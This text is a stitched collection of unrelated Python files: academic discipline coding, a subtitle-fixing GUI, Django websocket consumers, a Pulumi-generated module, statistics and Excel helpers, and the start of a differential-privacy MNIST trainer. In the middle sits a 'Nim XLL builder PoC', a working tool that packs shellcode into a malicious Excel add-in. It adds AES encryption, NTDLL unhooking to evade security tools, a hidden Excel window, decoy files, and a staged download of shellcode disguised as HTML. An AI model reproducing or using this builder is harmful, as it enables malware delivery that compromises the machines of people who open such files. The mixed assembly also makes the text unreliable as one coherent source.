sys_df = append_sys_df(sys_df, in_df["SUBFIELDCODE"][i], in_df["SUBFIELDNAME"][i], in_df["YEAR"][i], in_df["DEGREE"][i],
in_df["SUBJECT_CODE"][i], in_df["SUBJECT"][i], in_df["COMPONENT"][i], in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["YEAR"][i][-2:]).drop_duplicates().reset_index(drop=True)
sys_df = getPos5(sys_df, new_sys_df).drop_duplicates().reset_index(drop=True)
to_merge = sys_df[["DIS_CODE", "VERSION"]].copy()
    # pandas does not allow combining `on=` with `left_index=True`; merge on DIS_CODE only
    in_df_ver = pd.merge(in_df, to_merge, how="left", on="DIS_CODE").drop_duplicates().reset_index(drop=True)
out_df["DIS_CODE"] = in_df_ver["DIS_CODE"] + "." + in_df_ver["VERSION"].apply(str)
return out_df, sys_df
# generate unique code for a discipline that already exists
def generate_single_unique_code(sf_code, sf_name, year, subj_degree, subj_code, subj, comp, credit_units, sys_df=None):
if (sys_df is None) or sys_df.empty:
new_sys_df = 0
sys_df = create_sys_df()
else:
new_sys_df = 1
comp = cleanText(comp)
subj = cleanText(subj)
sys_df["YEAR"] = sys_df["YEAR"].apply(str)
year = str(year)
dis_code = getPos123(subj_degree, sf_code, sf_name, comp)
sem = ",".join(map(str, credit_units))
if (sf_name == "Разработка программного обеспечения / Software Engineering") and (dis_code.split(".")[2] in ["5", "6"]):
p34 = softwareEngineering(sys_df.loc[sys_df["DIS_CODE"].str.match(dis_code[:-2])], sem, dis_code, subj)
dis_code = dis_code[:-2] + str(p34)
elif (dis_code.split(".")[0] == "06") and (dis_code.split(".")[1] != "0") and (dis_code.split(".")[2] == "3"):
p234 = electiveModuleBachelor(sys_df.loc[sys_df["DIS_CODE"].str.match("06\.[1-7]\.3\.")], sem, dis_code, subj)
dis_code = dis_code[:3] + str(p234)
else:
p4 = getPos4(sys_df.loc[sys_df["DIS_CODE"].str.match(dis_code)], sem, dis_code, subj, sf_name)
dis_code = dis_code + str(p4)
sys_df = append_sys_df(sys_df, sf_code, sf_name, year, subj_degree, subj_code, subj, comp, sem, dis_code, year[-2:])
sys_df = getPos5(sys_df, new_sys_df)
dis_code = sys_df.iloc[-1, sys_df.columns.get_loc("DIS_CODE")] + "." + str(sys_df.iloc[-1, sys_df.columns.get_loc("VERSION")])
sys_df = sys_df.drop_duplicates().reset_index(drop=True)
return dis_code, sys_df
# Example
#start_time = time.time()
# generate codes for an excel file
"""
df1 = pd.read_excel("source_files/01.03.02.xlsx")
discipline_rep = pd.read_excel("source_files/discipline_bank.xlsx")
#processed_data, db = generate_df_w_unique_code(df1, discipline_rep)
processed_data, db = generate_df_w_unique_code(df1)
processed_data.to_excel("source_files/new_disciplines_test_bachelor_01.03.02.xlsx", index=False)
db.to_excel("source_files/discipline_bank.xlsx", index=False)
"""
"""
discipline_rep = pd.read_excel("source_files/discipline_bank.xlsx")
discipline_code, db = generate_single_unique_code("19.03.01",
"Биотехнология",
2020,
"Академический бакалавр",
32,
"Аналитическая химия и физико-химические методы анализа",
"Элективный модуль по группе направлений",
[0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0],
discipline_rep)
print(discipline_code)
db.to_excel("source_files/discipline_bank.xlsx", index=False)
"""
#print("--- %s seconds ---" % (time.time() - start_time))
|
'''
Created on Jan 30, 2016
@author: Ziv
'''
import sys
import tkinter as tk
import tkinter.constants
import tkinter.filedialog
from tkinter.scrolledtext import ScrolledText
from srtFix.processFile import processFile
from getArgs import fixParams
from srtFix.processFile import calculateOffset
class TkFileDialogExample(tk.Frame):
def __init__(self, root):
tk.Frame.__init__(self, root)
# # input field example
# self.pack()
#
# self.entrythingy = tk.Entry(self)
# self.entrythingy.pack()
# # here is the application variable
# self.contents = tk.StringVar()
# # set it to some value
# self.contents.set("this is a variable")
# # tell the entry widget to watch this variable
# self.entrythingy["textvariable"] = self.contents
#
# # and here we get a callback when the user hits return.
# # we will have the program print out the value of the
# # application variable when the user hits return
# self.entrythingy.bind('<Key-Return>',
# self.print_contents)
#Test widget
self.log=ScrolledText(self,width=70)
        # init filename to empty string
self.filename=''
# options for buttons
button_opt = {'fill': tk.constants.BOTH, 'padx': 5, 'pady': 5}
#direction
self.dirVal='movie-after'
self.dirButton = tk.Button(self, text=self.dirVal,
command=self.dirToggle)
# define buttons
tk.Label(self, text='Start Diff',anchor=tk.E).grid(row=0,column=0,sticky=tk.E+tk.W)
self.startDiff=tk.StringVar()
self.startDiff.set('')
tk.Entry(self, textvariable=self.startDiff).grid(row=0,column=1,sticky=tk.W+tk.E)
tk.Label(self, text='End Diff',anchor=tk.E).grid(row=1,column=0,sticky=tk.E+tk.W)
self.endDiff=tk.StringVar()
self.endDiff.set('')
tk.Entry(self, textvariable=self.endDiff).grid(row=1,column=1,sticky=tk.W+tk.E)
self.dirButton.grid(row=0,column=2,sticky=tk.W+tk.E)
tk.Button(self, text='Choose file', command=self.askfilename).grid(row=1,column=2,sticky=tk.W+tk.E)
# Translate
tk.Button(self, text='Translate',command=self.translate).grid(row=2,column=0,sticky=tk.E+tk.W)
tk.Button(self, text='Go', command=self.go).grid(row=0,column=3, rowspan=2,sticky=tk.W+tk.S+tk.E+tk.N)
self.log.grid(row=3,column=0,columnspan=4)
# tk.Button(self, text='askopenfile', command=self.askopenfile).pack(**button_opt)
# tk.Button(self, text='asksaveasfile', command=self.asksaveasfile).pack(**button_opt)
# tk.Button(self, text='asksaveasfilename', command=self.asksaveasfilename).pack(**button_opt)
# tk.Button(self, text='askdirectory', command=self.askdirectory).pack(**button_opt)
# define options for opening or saving a file
self.file_opt = options = {}
options['defaultextension'] = '.srt'
options['filetypes'] = [('srt files', '.srt'),('all files', '.*')]
options['initialdir'] = 'C:\\Data\\--Movies'
#options['initialfile'] = 'myfile.txt'
options['parent'] = root
options['title'] = 'srtFix - Choose file'
# This is only available on the Macintosh, and only when Navigation Services are installed.
# options['message'] = 'message'
# if you use the multiple file version of the module functions this option is set automatically.
# options['multiple'] = 1
# defining options for opening a directory
self.dir_opt = options = {}
options['parent'] = root
options['title'] = 'This is a title'
options['mustexist'] = True
options['initialdir'] = 'C:\\'
def dirToggle(self):
self.dirVal = 'movie-before' if self.dirVal == 'movie-after' else 'movie-after'
self.dirButton['text']=self.dirVal
def translate(self):
self.toScreenLog('translate pressed')
def toScreenLog(self, s):
self.log.insert(tk.END, '\n'+s)
def print_contents(self, event):
print("hi. contents of entry is now ---->",
self.contents.get())
print("startDiff:", self.startDiff.get())
def go(self):
try:
print ("startDiff:{0},endDiff:{1},dir:{2},file:{3}".format(self.startDiff.get(),self.endDiff.get(),self.dirVal,self.filename))
            #pack parameters and process file
sd=float(self.startDiff.get())
#r=parse('{n:d}',self.endDiff.get())
            ed = None if self.endDiff.get() == '' else float(self.endDiff.get())
params=fixParams(f=self.filename,s=sd,e=ed, d=self.dirVal)
self.toScreenLog("startDiff:{0},endDiff:{1},dir:{2},file:{3}".format(params.startDiff,params.endDiff,params.direction,params.fname))
calculateOffset(params)
#self.toScreenLog("movie len:{0},out file name:{1}".format(params.movieLen,params.outfname))
processFile(params)
self.toScreenLog("Done. Output file:%s" % params.outfname)
except ValueError:
self.toScreenLog('Enter a number in the Diff fields')
except IOError:
            e = sys.exc_info()[1]
            self.toScreenLog(str(e))
print('Try again')
except:
e=sys.exc_info()[0]
print("Unexpected error:", e)
raise
def askopenfile(self):
"""Returns an opened file in read mode."""
return tk.filedialog.askopenfile(mode='r', **self.file_opt)
def askfilename(self):
"""Returns an opened file in read mode.
This time the dialog just returns a filename and the file is opened by your own code.
"""
# get filename
self.filename = tk.filedialog.askopenfilename(**self.file_opt)
self.toScreenLog(self.filename)
def asksaveasfile(self):
"""Returns an opened file in write mode."""
return tk.filedialog.asksaveasfile(mode='w', **self.file_opt)
def asksaveasfilename(self):
"""Returns an opened file in write mode.
This time the dialog just returns a filename and the file is opened by your own code.
"""
# get filename
filename = tk.filedialog.asksaveasfilename(**self.file_opt)
# open file on your own
if filename:
return open(filename, 'w')
def askdirectory(self):
"""Returns a selected directoryname."""
return tk.filedialog.askdirectory(**self.dir_opt)
if __name__ == '__main__':
root = tk.Tk()
TkFileDialogExample(root).grid()
root.mainloop()
|
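# Read two integer sequences from stdin (their lengths N and M on the first line,
# the values themselves on the rest of the input) and print every value in
# ascending numeric order, separated by spaces.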
import sys
N, M = sys.stdin.readline().split()
AandB = sys.stdin.read().split()
print(' '.join(sorted(AandB, key=int)))
|
import argparse
import base64
import os
import random
import shutil
from binascii import hexlify
from Crypto.Cipher import AES
from Crypto.Util import Counter
banner = """
_ _
| | |
_ _ _ _ ____ ____| | | ____
( \\ / ) | | |/ ___) _ ) | |/ _ |
) X (| |_| | | ( (/ /| | ( ( | |
(_/ \\_)\\__ |_| \\____)_|_|\\_||_|
(____/ Nim XLL builder PoC v0.2.1
"""
print(banner)
def encode_shellcode(sc_bytes):
STATE_OPEN = "<"
STATE_CLOSE = ">"
STATE_CLOSETAG = "/>"
STATE_EQUALS = " = "
STATE_PAYLOADTAG = "x"
STATE_PAYLOADBODY = "y"
STATE_TAGSPACE = "STATE_TAGSPACE"
STATE_BODYSPACE = "STATE_BODYSPACE"
STATE_CRLF = "\n"
transitions = {
STATE_OPEN : { STATE_PAYLOADTAG: 1 },
STATE_CLOSE : { STATE_PAYLOADBODY: 1 },
STATE_CLOSETAG : { STATE_OPEN: 1 },
STATE_EQUALS : { STATE_PAYLOADTAG: 1 },
STATE_PAYLOADTAG : {STATE_PAYLOADTAG: 0.5, STATE_CLOSETAG: 0.15, STATE_CLOSE: 0.15, STATE_TAGSPACE: 0.1, STATE_EQUALS: 0.1},
STATE_PAYLOADBODY : {STATE_PAYLOADBODY: 0.775, STATE_BODYSPACE: 0.1, STATE_CRLF: 0.025, STATE_OPEN: 0.1},
STATE_TAGSPACE : { STATE_PAYLOADTAG: 1 },
STATE_BODYSPACE : { STATE_PAYLOADBODY: 1 },
STATE_CRLF : { STATE_PAYLOADBODY: 1 }
}
to_encode = base64.urlsafe_b64encode(sc_bytes)
out = ""
current_state = STATE_OPEN
encoded_chars = 0
out += "<html>\n"
while encoded_chars < len(to_encode):
if current_state in [STATE_BODYSPACE, STATE_TAGSPACE]:
out += " "
elif current_state in [STATE_PAYLOADTAG, STATE_PAYLOADBODY]:
out += chr(to_encode[encoded_chars])
encoded_chars += 1
else:
out += current_state
current_state = random.choices(list(transitions[current_state].keys()), list(transitions[current_state].values()))[0]
out += "\n</html>"
return out
def bytes_to_nimarr(bytestr, varname, genconst=False):
byteenum = ""
for i in bytestr:
byteenum += "{0:#04x}, ".format(i)
if genconst:
return "const "+varname+": array[{}, byte] = [byte {}]".format(len(bytestr), byteenum[:-2])
return "var "+varname+": array[{}, byte] = [byte {}]".format(len(bytestr), byteenum[:-2])
parser = argparse.ArgumentParser()
staging = parser.add_argument_group('staging arguments')
staging.add_argument("-u", "--stageurl", type=str,
help="URL to stage from (if staged, optional)")
stageless = parser.add_argument_group('stageless arguments')
stageless.add_argument("-e", "--encrypt", action="store_true",
help="encrypt shellcode (aes128-cbc)")
compilation = parser.add_argument_group('compilation arguments')
compilation.add_argument("-n", "--skip-unhook", action="store_true",
help="do not do NTDLL unhooking")
compilation.add_argument("-w", "--hidewindow", action="store_true",
help="hide excel window during execution")
compilation.add_argument("-d", "--decoy", type=str,
help="path to the decoy file to open on startup (optional)")
compilation.add_argument("-v", "--verbose", action="store_true",
help="increase output verbosity")
compilation.add_argument("-o", "--output", type=str, default="addin.xll",
help="path to store the resulting .XLL file (optional)")
required = parser.add_argument_group('required arguments')
required.add_argument("-s", "--shellcode", type=str,
help="path to shellcode .bin (required)", required=True)
args = parser.parse_args()
with open("xll_template.nim", "r") as f:
template_str = f.read()
compile_template = "nim c --app:lib --passL:\"-static-libgcc -static -lpthread\" --hints:off --define:excel {cmdline_args} --nomain --out:{outfile} --threads:on {filename}"
cmdline_args = ""
if os.name != 'nt':
print("| cross-compilation unstable")
cmdline_args += "--define:mingw --cpu:amd64 "
if not args.skip_unhook:
cmdline_args += "--define:unhook "
print("| NTDLL unhooking: on")
else:
print("| NTDLL unhooking: off")
if args.hidewindow:
cmdline_args += "--define:hidewindow "
print("| hide excel window: on")
else:
print("| hide excel window: off")
print("| release mode: off")
if args.stageurl is None:
if args.encrypt:
print("| generating stageless payload")
print("| encryption: on")
cmdline_args += "--define:encrypted "
with open(args.shellcode, "rb") as f:
scode_bytes = f.read()
key = os.urandom(16)
iv = os.urandom(16)
ctr = Counter.new(128, initial_value=int(hexlify(iv), 16))
cipher = AES.new(key, AES.MODE_CTR, counter=ctr)
encdata = cipher.encrypt(scode_bytes)
xll_nim = template_str.replace("#[ KEY_STR ]#", bytes_to_nimarr(key, "aeskey", True))
xll_nim = xll_nim.replace("#[ IV_STR ]#", bytes_to_nimarr(iv, "aesiv", True))
xll_nim = xll_nim.replace("#[ ENC_SC ]#", bytes_to_nimarr(encdata, "aesdata", True))
else:
print("| generating stageless payload")
print("| encryption: off")
with open(args.shellcode, "rb") as f:
scode_bytes = f.read()
bytes_template = bytes_to_nimarr(scode_bytes, "shellcode")
xll_nim = template_str.replace('echo "%SHELLCODE_ARRAY%"', bytes_template)
else:
print("| generating staged payload")
cmdline_args += "--define:staged "
if args.verbose:
print(" \\ URL:", args.stageurl)
with open(args.shellcode, "rb") as f:
scode_bytes = f.read()
with open(args.shellcode+".html", "w") as f:
f.write(encode_shellcode(scode_bytes))
print("| encoded shellcode saved as", args.shellcode+".html")
xll_nim = template_str.replace('%STAGINGURL%', args.stageurl)
if args.decoy is not None:
print("| decoy file:", args.decoy)
xll_nim = xll_nim.replace("%DECOYFILE%", os.path.split(args.decoy)[1])
xll_nim = xll_nim.replace("%DECOYPATH%", args.decoy)
cmdline_args += "--define:decoy "
tempname = "temp_xll_{}.nim".format(random.randint(1,50))
with open(tempname, "w") as f:
f.write(xll_nim)
if args.verbose:
print(" \\ command line:", compile_template.format(cmdline_args=cmdline_args, outfile=args.output, filename=tempname))
os.system(compile_template.format(cmdline_args=cmdline_args, outfile=args.output, filename=tempname))
os.remove(tempname)
print("! should be saved to: ", args.output)
|
from mkcommit import CommitMessage, editor, to_stdout
def commit():
return CommitMessage("whatever", editor())
if __name__ == "__main__":
to_stdout(commit())
|
"""Channel consumers."""
import json
from channels import Group
from channels.auth import channel_session_user, channel_session_user_from_http
from rest_framework.renderers import JSONRenderer
from .actions import send_real_person_status, send_scenes_status, send_units_status, STATUS_GROUP
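# Inbound client messages are JSON text frames; the only action handled below is
# {"action": "status"}, which re-sends the units status to the requesting channel.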
@channel_session_user_from_http
def ws_connect(message):
"""Add only authenticated users to the channel group."""
if message.user.is_authenticated():
message.reply_channel.send({'accept': True})
send_real_person_status(channel=message.reply_channel)
send_units_status(channel=message.reply_channel)
send_scenes_status(channel=message.reply_channel)
Group(STATUS_GROUP).add(message.reply_channel)
else:
message.reply_channel.send({
'text': JSONRenderer().render({
'error': 403
}).decode('utf-8')
})
message.reply_channel.send({'close': True})
@channel_session_user
def ws_receive(message):
"""Receive messages from the websocket."""
try:
data = json.loads(message.content['text'])
except json.JSONDecodeError:
message.reply_channel.send({
'text': JSONRenderer().render({
'error': 'unable to parse JSON message'
}).decode('utf-8')
})
else:
if 'action' in data:
if data['action'] == 'status':
send_units_status(channel=message.reply_channel)
else:
message.reply_channel.send({
'text': JSONRenderer().render({
'error': 'unknown action'
}).decode('utf-8')
})
@channel_session_user
def ws_disconnect(message):
"""Remove sockets from the group."""
Group(STATUS_GROUP).discard(message.reply_channel)
|
from pystats import *
mean = 3.95 # mean of the samples
stddev = 0.1 # standard deviation of the samples
lower_bound = 3.9
upper_bound = 4.1
print('Fraction under lower bound [ P(X <= {:1.4f}) ] = {:1.4f}'.format(lower_bound, pnorm(lower_bound, mean, stddev)))
print('Fraction over upper bound [ P(X > {:1.4f}) ] = {:1.4f}'.format(upper_bound, 1-pnorm(upper_bound, mean, stddev)))
frac = pnorm(upper_bound, mean, stddev) - pnorm(lower_bound, mean, stddev)
print('Fraction between both bounds [ P({:1.4f} <= X <= {:1.4f}) ] = {:1.4f}'.format(lower_bound, upper_bound, frac))
print('95% of samples are under {:1.4f}'.format(qnorm(0.95, mean, stddev)))
|
# import pandas as pd
# import numpy as np
# import matplotlib.pyplot as plt
# df = pd.read_csv('C:\\Yitian\\FS_CE_NETS_Py\\1.csv')
# #df=df.to_excel('C:\Yitian\FS_Cascading_Events_NETS\Frequency Response.xlsx', 'Line_02-03_Outage', index=False)
# x=df.ix[2:2000,'Results']
# #Titles = np.array(df.loc[-1, :])
# #x = np.array(df.loc[3:, 1])
# #print(Titles)
# for i in range(1,34):
# a='bus',i
# print(a)
# y = df.loc[2:2000, a]
# plt.plot(x, y, label = a, linewidth = 0.2)
# plt.xlabel('Time')
# plt.ylabel('Frequency Response')
# plt.title('Frequency Responses')
# plt.legend()
# plt.xticks(range(0, 20, 5))
# #plt.yticks(range(0, 2, 0.01))
# plt.show()
def read_excel(file, sheet, row1, row2, col1, col2, sf):
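    """Read a rectangular block of cells from an Excel sheet into a numpy array.

    row1..row2 and col1..col2 are 1-based, inclusive ranges; numeric cells are
    multiplied by the scale factor sf, other cells are kept as-is. Note that the
    returned array has one row per spreadsheet *column*, since the outer loop
    iterates over columns.
    """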
import xlrd
import numpy as np
# file = 'ACTIVSg200.xlsx'
list_data = []
wb = xlrd.open_workbook(filename = file)
sheet1 = wb.sheet_by_name(sheet)
rows = sheet1.row_values(2)
for j in range(col1 - 1, col2) :
data = []
for i in range(row1 - 1, row2) :
if sheet1.cell(i,j).ctype == 2 :
data.append(float(sheet1.cell(i,j).value) * sf)
else:
data.append(sheet1.cell(i,j).value)
list_data.append(data)
datamatrix = np.array(list_data)
return datamatrix
# # test
# import itertools
# import numpy as np
# data = read_excel('Line Parameters', 3, 36, 1, 3, 1.0)
# Lines = [1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 15, 16, 17, 18, 19, 23, 24, 25, 26, 27, 28, 29, 30, 31, 35, 36, 38, 40, 42, 43, 44, 45]
# p1= []
# p2 =[]
# for lines in itertools.combinations(Lines, 2):
# p1.append(lines[0])
# p1.append(lines[1])
# p2.append(p1)
# p1= []
# P= np.array(p2)
# print(p2)
# print(len(p2))
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetEvaluationJobResult',
'AwaitableGetEvaluationJobResult',
'get_evaluation_job',
'get_evaluation_job_output',
]
@pulumi.output_type
class GetEvaluationJobResult:
def __init__(__self__, annotation_spec_set=None, attempts=None, create_time=None, description=None, evaluation_job_config=None, label_missing_ground_truth=None, model_version=None, name=None, schedule=None, state=None):
if annotation_spec_set and not isinstance(annotation_spec_set, str):
raise TypeError("Expected argument 'annotation_spec_set' to be a str")
pulumi.set(__self__, "annotation_spec_set", annotation_spec_set)
if attempts and not isinstance(attempts, list):
raise TypeError("Expected argument 'attempts' to be a list")
pulumi.set(__self__, "attempts", attempts)
if create_time and not isinstance(create_time, str):
raise TypeError("Expected argument 'create_time' to be a str")
pulumi.set(__self__, "create_time", create_time)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if evaluation_job_config and not isinstance(evaluation_job_config, dict):
raise TypeError("Expected argument 'evaluation_job_config' to be a dict")
pulumi.set(__self__, "evaluation_job_config", evaluation_job_config)
if label_missing_ground_truth and not isinstance(label_missing_ground_truth, bool):
raise TypeError("Expected argument 'label_missing_ground_truth' to be a bool")
pulumi.set(__self__, "label_missing_ground_truth", label_missing_ground_truth)
if model_version and not isinstance(model_version, str):
raise TypeError("Expected argument 'model_version' to be a str")
pulumi.set(__self__, "model_version", model_version)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if schedule and not isinstance(schedule, str):
raise TypeError("Expected argument 'schedule' to be a str")
pulumi.set(__self__, "schedule", schedule)
if state and not isinstance(state, str):
raise TypeError("Expected argument 'state' to be a str")
pulumi.set(__self__, "state", state)
@property
@pulumi.getter(name="annotationSpecSet")
def annotation_spec_set(self) -> str:
"""
Name of the AnnotationSpecSet describing all the labels that your machine learning model outputs. You must create this resource before you create an evaluation job and provide its name in the following format: "projects/{project_id}/annotationSpecSets/{annotation_spec_set_id}"
"""
return pulumi.get(self, "annotation_spec_set")
@property
@pulumi.getter
def attempts(self) -> Sequence['outputs.GoogleCloudDatalabelingV1beta1AttemptResponse']:
"""
Every time the evaluation job runs and an error occurs, the failed attempt is appended to this array.
"""
return pulumi.get(self, "attempts")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> str:
"""
Timestamp of when this evaluation job was created.
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter
def description(self) -> str:
"""
Description of the job. The description can be up to 25,000 characters long.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="evaluationJobConfig")
def evaluation_job_config(self) -> 'outputs.GoogleCloudDatalabelingV1beta1EvaluationJobConfigResponse':
"""
Configuration details for the evaluation job.
"""
return pulumi.get(self, "evaluation_job_config")
@property
@pulumi.getter(name="labelMissingGroundTruth")
def label_missing_ground_truth(self) -> bool:
"""
Whether you want Data Labeling Service to provide ground truth labels for prediction input. If you want the service to assign human labelers to annotate your data, set this to `true`. If you want to provide your own ground truth labels in the evaluation job's BigQuery table, set this to `false`.
"""
return pulumi.get(self, "label_missing_ground_truth")
@property
@pulumi.getter(name="modelVersion")
def model_version(self) -> str:
"""
The [AI Platform Prediction model version](/ml-engine/docs/prediction-overview) to be evaluated. Prediction input and output is sampled from this model version. When creating an evaluation job, specify the model version in the following format: "projects/{project_id}/models/{model_name}/versions/{version_name}" There can only be one evaluation job per model version.
"""
return pulumi.get(self, "model_version")
@property
@pulumi.getter
def name(self) -> str:
"""
After you create a job, Data Labeling Service assigns a name to the job with the following format: "projects/{project_id}/evaluationJobs/ {evaluation_job_id}"
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def schedule(self) -> str:
"""
Describes the interval at which the job runs. This interval must be at least 1 day, and it is rounded to the nearest day. For example, if you specify a 50-hour interval, the job runs every 2 days. You can provide the schedule in [crontab format](/scheduler/docs/configuring/cron-job-schedules) or in an [English-like format](/appengine/docs/standard/python/config/cronref#schedule_format). Regardless of what you specify, the job will run at 10:00 AM UTC. Only the interval from this schedule is used, not the specific time of day.
"""
return pulumi.get(self, "schedule")
@property
@pulumi.getter
def state(self) -> str:
"""
Describes the current state of the job.
"""
return pulumi.get(self, "state")
class AwaitableGetEvaluationJobResult(GetEvaluationJobResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetEvaluationJobResult(
annotation_spec_set=self.annotation_spec_set,
attempts=self.attempts,
create_time=self.create_time,
description=self.description,
evaluation_job_config=self.evaluation_job_config,
label_missing_ground_truth=self.label_missing_ground_truth,
model_version=self.model_version,
name=self.name,
schedule=self.schedule,
state=self.state)
def get_evaluation_job(evaluation_job_id: Optional[str] = None,
project: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetEvaluationJobResult:
"""
Gets an evaluation job by resource name.
"""
__args__ = dict()
__args__['evaluationJobId'] = evaluation_job_id
__args__['project'] = project
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('google-native:datalabeling/v1beta1:getEvaluationJob', __args__, opts=opts, typ=GetEvaluationJobResult).value
return AwaitableGetEvaluationJobResult(
annotation_spec_set=__ret__.annotation_spec_set,
attempts=__ret__.attempts,
create_time=__ret__.create_time,
description=__ret__.description,
evaluation_job_config=__ret__.evaluation_job_config,
label_missing_ground_truth=__ret__.label_missing_ground_truth,
model_version=__ret__.model_version,
name=__ret__.name,
schedule=__ret__.schedule,
state=__ret__.state)
@_utilities.lift_output_func(get_evaluation_job)
def get_evaluation_job_output(evaluation_job_id: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[Optional[str]]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetEvaluationJobResult]:
"""
Gets an evaluation job by resource name.
"""
...
|
# python mysql
from configparser import RawConfigParser, Error
import os
def readConfig():
"""
Return
------
`(variable) config: ConfigParser`
"""
# Deal with path issue
folder = os.path.dirname(os.path.abspath(__file__))
config_file = os.path.join(folder, 'localConfig.env')
config = RawConfigParser()
res = config.read(config_file)
return config
if __name__ == "__main__":
config = readConfig()
print(config)
print(config.get('DB', 'host')) |
#!/usr/bin/env python2.7
"""
update_dreqs_0012.py
This script is run to update the version on two of the CNRM-CM6-1-HR to the
same as the first submission. The files for these two submissions are then
copied to the same directory and the directory value for that file is updated
to the new path.
"""
import argparse
from datetime import datetime
import logging.config
import sys
from cf_units import date2num, CALENDAR_360_DAY
import django
django.setup()
from django.core.exceptions import MultipleObjectsReturned, ObjectDoesNotExist
from pdata_app.models import DataSubmission, DataFile
__version__ = '0.1.0b1'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
NEW_VERSION = 'v20170623'
def parse_args():
"""
Parse command-line arguments
"""
parser = argparse.ArgumentParser(description='Add additional data requests')
parser.add_argument('-l', '--log-level', help='set logging level to one of '
'debug, info, warn (the default), or error')
parser.add_argument('--version', action='version',
version='%(prog)s {}'.format(__version__))
args = parser.parse_args()
return args
def main(args):
"""
Main entry point
"""
data_subs = [
{'dir': '/group_workspaces/jasmin2/primavera4/upload/CNRM-CERFACS/'
'CNRM-CM6-1-HR/incoming/v20170518_1970',
'version': 'v20170622'},
{'dir': '/group_workspaces/jasmin2/primavera4/upload/CNRM-CERFACS/'
'CNRM-CM6-1-HR/incoming/v20170518_1960',
'version': 'v20170703'}
]
for data_sub_dict in data_subs:
try:
data_sub = DataSubmission.objects.get(
incoming_directory=data_sub_dict['dir'])
        except MultipleObjectsReturned:
            logger.error('Multiple submissions found for {}'.
                         format(data_sub_dict['dir']))
            continue
        except ObjectDoesNotExist:
            logger.error('No submissions found for {}'.
                         format(data_sub_dict['dir']))
            continue
        for data_file in data_sub.datafile_set.all():
            # Assumed intent from the module docstring: move every file in the
            # submission onto the new common version (the bare attribute access
            # here originally had no effect).
            data_file.version = NEW_VERSION
            data_file.save()
if __name__ == "__main__":
cmd_args = parse_args()
# determine the log level
if cmd_args.log_level:
try:
log_level = getattr(logging, cmd_args.log_level.upper())
except AttributeError:
logger.setLevel(logging.WARNING)
logger.error('log-level must be one of: debug, info, warn or error')
sys.exit(1)
else:
log_level = DEFAULT_LOG_LEVEL
# configure the logger
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'standard': {
'format': DEFAULT_LOG_FORMAT,
},
},
'handlers': {
'default': {
'level': log_level,
'class': 'logging.StreamHandler',
'formatter': 'standard'
},
},
'loggers': {
'': {
'handlers': ['default'],
'level': log_level,
'propagate': True
}
}
})
# run the code
main(cmd_args)
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Example differentially private trainer and evaluator for MNIST.
"""
from __future__ import division
import json
import os
import sys
import time
import numpy as np
from six.moves import xrange
import tensorflow as tf
from differential_privacy.dp_sgd.dp_optimizer import dp_optimizer
from differential_privacy.dp_sgd.dp_optimizer import dp_pca
from differential_privacy.dp_sgd.dp_optimizer import sanitizer
from differential_privacy.dp_sgd.dp_optimizer import utils
from differential_privacy.privacy_accountant.tf import accountant
# parameters for the training
tf.flags.DEFINE_integer("batch_size", 600,
"The training batch size.")
tf.flags.DEFINE_integer("batches_per_lot", 1,
"Number of batches per lot.")
# Together, batch_size and batches_per_lot determine lot_size.
tf.flags.DEFINE_integer("num_training_steps", 50000,
"The number of training steps."
"This counts number of lots.")
tf.flags.DEFINE_bool("randomize", True,
"If true, randomize the input data; otherwise use a fixed "
"seed and non-randomized input.")
tf.flags.DEFINE_bool("freeze_bottom_layers", False,
"If true, only train on the logit layer.")
tf.flags.DEFINE_bool("save_mistakes", False,
"If true, save the mistakes made during testing.")
tf.flags.DEFINE_float("lr", 0.05, "start learning rate")
tf.flags.DEFINE_float("end_lr", 0.05, "end learning rate")
tf.flags.DEFINE_float("lr_saturate_epochs", 0,
"learning rate saturate epochs; set to 0 for a constant "
"learning rate of --lr.")
# For searching parameters
tf.flags.DEFINE_integer("projection_dimensions", 60,
"PCA projection dimensions, or 0 for no projection.")
tf.flags.DEFINE_integer("num_hidden_layers", 1,
"Number of hidden layers in the network")
tf.flags.DEFINE_integer("hidden_layer_num_units", 1000,
"Number of units per hidden layer")
tf.flags.DEFINE_float("default_gradient_l2norm_bound", 4.0, "norm clipping")
tf.flags.DEFINE_integer("num_conv_layers", 0,
"Number of convolutional layers to use.")
tf.flags.DEFINE_string("training_data_path",
"/tmp/mnist/mnist_train.tfrecord",
"Location of the training data.")
tf.flags.DEFINE_string("eval_data_path",
"/tmp/mnist/mnist_test.tfrecord",
"Location of the eval data.")
tf.flags.DEFINE_integer("eval_steps", 10,
"Evaluate the model every eval_steps")
# Parameters for privacy spending. We allow linearly varying eps during
# training.
